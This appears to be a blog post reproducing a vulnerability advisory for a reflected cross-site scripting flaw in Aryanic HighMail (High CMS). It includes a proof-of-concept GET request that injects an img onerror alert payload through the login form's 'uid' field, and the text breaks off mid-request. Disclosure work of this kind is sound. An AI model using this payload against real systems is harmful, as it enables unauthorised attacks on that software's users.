Posts

Showing posts from March, 2021

Aryanic HighMail (High CMS) - Reflected Cross Site Scripting Vulnerability

# Exploit Title: Aryanic HighMail (High CMS) - Reflected Cross Site Scripting Vulnerability # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://www.aryanic.com/ # Product Homepage: https://www.aryanic.com/products-highcms.html # Version: Current (as of 4/20/2020) # CWE : CWE-79 [Description]   # Aryanic HighMail is an email service, part of ARYENA CMS (High CMS 2002-2020) with large number of installations in private and public sector of Iran. # Due to improper input fields data filtering, current version (and possibly previous versions), are affected by a reflected XSS vulnerability.  [Proof of Concept] # Improper input fields (value of "uid" of "LoginForm" table) data filtering leads to possible code injection by closing the field tag, and injecting code, which is then reflected off the web server. [GET Request] GET /login/?uid="><img%20src="x"%20onerror="alert(%27XSS%27);"> HTTP/1.1 Host: host Cache-Control: private Conten